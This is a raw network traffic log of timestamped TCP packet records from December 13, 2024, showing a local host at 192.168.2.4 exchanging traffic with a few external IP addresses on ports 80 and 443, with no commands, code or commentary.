                                                                                                                                                                                                                                                Dec 13, 2024 13:52:14.832462072 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:14.837275028 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:14.879329920 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.264832020 CET8049757185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.268461943 CET4975780192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.286350012 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.290123940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.303180933 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.303209066 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.303236961 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.303301096 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.303302050 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.303390980 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.303390980 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.308262110 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.308305025 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.406769037 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.406848907 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.409945965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.410020113 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.410218954 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.532423973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.756613970 CET49764443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.756647110 CET44349764116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.756725073 CET49764443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.757021904 CET49764443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:15.757036924 CET44349764116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734319925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734369993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734492064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734586954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734597921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734615088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734646082 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734680891 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734791994 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734802961 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734818935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734829903 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734842062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734869003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734896898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.738507032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.854470015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.854521990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.854597092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.858637094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.858705997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.858747005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.858807087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.926721096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.926836014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.926914930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.929194927 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.929255009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.929287910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.929342985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.937705994 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.937911987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.938008070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.946280956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.946301937 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.946376085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.954785109 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.954807997 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.954848051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.954884052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.963260889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.963329077 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.963361025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.963406086 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.971775055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.971827984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.971848965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.971892118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.980384111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.980446100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.980457067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.980499983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.988840103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.988905907 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.989043951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.989092112 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.997276068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.997361898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.997426987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.004507065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.004600048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.004679918 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.011970043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.012025118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.012087107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.012171984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.046700954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.046821117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.068672895 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.118923903 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.119057894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.119071007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.119182110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.121361971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.121417046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.121438980 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.121479034 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.124938011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.124963999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.124999046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.125015974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.129712105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.129765987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.129792929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.130429029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.134337902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.134407997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.134439945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.134485006 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.138981104 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.139050007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.139066935 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.139085054 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.143593073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.143717051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.143888950 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.148121119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.148209095 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.148775101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.152645111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.152714968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.152759075 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.152798891 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.157200098 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.157221079 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.157277107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.161489964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.161567926 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.161659002 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.161704063 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.166001081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.166068077 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.166115999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.166156054 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.170556068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.170623064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.170649052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.170697927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.175036907 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.175088882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.175116062 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.175158024 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.179461956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.179546118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.179567099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.179619074 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.183475971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.183557987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.183568954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.183787107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.186741114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.186819077 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.186837912 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.186899900 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.188637972 CET8049724199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.188730001 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.190512896 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.190597057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.190617085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.190638065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.194094896 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.194135904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.194216013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.197789907 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.197834015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.197916031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.201381922 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.201491117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.201580048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.201580048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.311109066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.311192036 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.311228991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.311270952 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.312458038 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.312510967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.312537909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.312576056 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.314543009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.314603090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.314687967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.314730883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.317373991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.317416906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.317433119 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.317451000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.320189953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.320271969 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.320281982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.320327997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.323004961 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.323020935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.323088884 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.325577974 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.325640917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.325738907 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.325807095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.328308105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.328373909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.328387022 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.328433990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.330787897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.330845118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.330883026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.330925941 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.333388090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.333440065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.333477974 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.333527088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.336074114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.336124897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.336144924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.336190939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.338542938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.338594913 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.338618994 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.338665962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.341201067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.341243982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.341253996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.341290951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.343733072 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.343787909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.343875885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.343924999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.346297026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.346395969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.346447945 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.346447945 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.348875999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.348915100 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.348929882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.348953962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.351457119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.351521969 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.351535082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.351573944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.354229927 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.354285002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.354468107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.354515076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.356631041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.356684923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.356692076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.356738091 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.359375000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.359431028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.359440088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.359488964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.361772060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.361823082 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.361875057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.361916065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.364377975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.364429951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.364466906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.364511967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.366920948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.367002964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.367059946 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.367124081 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.369554996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.369580984 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.369612932 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.369646072 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.372107983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.372143984 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.372159004 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.372189999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.374634981 CET804976331.41.244.11192.168.2.4
